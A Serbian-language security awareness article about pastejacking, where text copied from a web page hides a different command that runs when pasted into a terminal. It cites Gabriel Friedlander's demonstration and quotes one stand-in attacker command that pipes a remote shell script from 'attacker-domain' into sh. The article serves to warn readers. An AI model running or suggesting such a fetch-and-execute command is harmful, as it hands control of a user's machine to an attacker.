- Сви свакодневно копирамо и лепимо са интернета, а да заправо не знамо за ризике.
- Стручњак за безбедност је одвојио време да покаже свима најгори сценарио када је ово радио.
- Лепљење команди које сте добили са интернета у свој терминал је брз начин да будете хаковани
- Команде за које сте мислили да их лепите у свој терминал су заправо злонамерни кодови.
Истина је да живимо у ери у којој је брзина све, а постизање брзих резултата је све што је важно. Међутим, мало људи заправо стане на секунд и размишља о последицама.
Свакодневно, милиони програмера, администратора и истраживача безбедности обављају једноставне задатке попут копирања и лепљења команди са веб страница директно у конзоле на својим рачунарима.
Иако многи о томе чак и не размишљају, импликације су веће и опасније него што мислите у почетку, посебно ако чувате осетљиве или вредне податке.
Познати стручњак за безбедност је одвојио време да подели шта би се заправо могло догодити ако копирате и налепите садржај са веб страница.
Цопи+Пасте је једноставан начин да заиста будете хаковани
Габријел Фридландер, који је оснивач платформе за обуку о свести о безбедности Визер, повукао је насловницу са шеме која ће вас натерати да размислите двапут пре него што копирате и лепите команде са веб страница.
Копирање и лепљење садржаја са интернета постало је толико уобичајено у данашње време да нико о томе не размишља.
Међутим, Фридландер упозорава да су неке веб странице варљивије него што би се на први поглед могло схватити, а оно што мислите да сте копирали са ње се веома разликује од онога што сте заправо урадили.
А најгоре у свему овоме је то што, без потребног знања или упутства, жртве схвате своју грешку тек након што налепе текст, у ком тренутку већ може бити касно.
Безбедносни аналитичар је такође осмислио мали тест за читаоце свог блога, само да би људи разумели колико вам је лако да невољно отворите врата сајбер криминалцима.
Он је дао наредбу која је намењена за копирање, али истина која се тиче открива се тек када налепите текст и видите шта сте заправо увели у своје подешавање.
Након копирања команде приказане на слици изнад, резултат лепљења ће вас шокирати, јер је далеко од онога што сте мислили да дуплирате.
цурл http://attacker-domain: 8000/схелл.сх | схПоред потпуно другачије команде присутне у вашем међуспремнику, знак за нови ред (или повратак) на крај значи да ће се горњи пример извршити чим се налепи директно у Линук терминал.
Зато је боље да будете свеснији шта се заправо дешава и да ово третирате као озбиљну опасност по безбедност. Не кажемо да све веб локације скривају злонамерни садржај, али се исплати узети у обзир ово.
Да ли сте икада били хаковани због лепљења лажних команди у свој терминал? Поделите своје искуство са нама у одељку за коментаре испод.
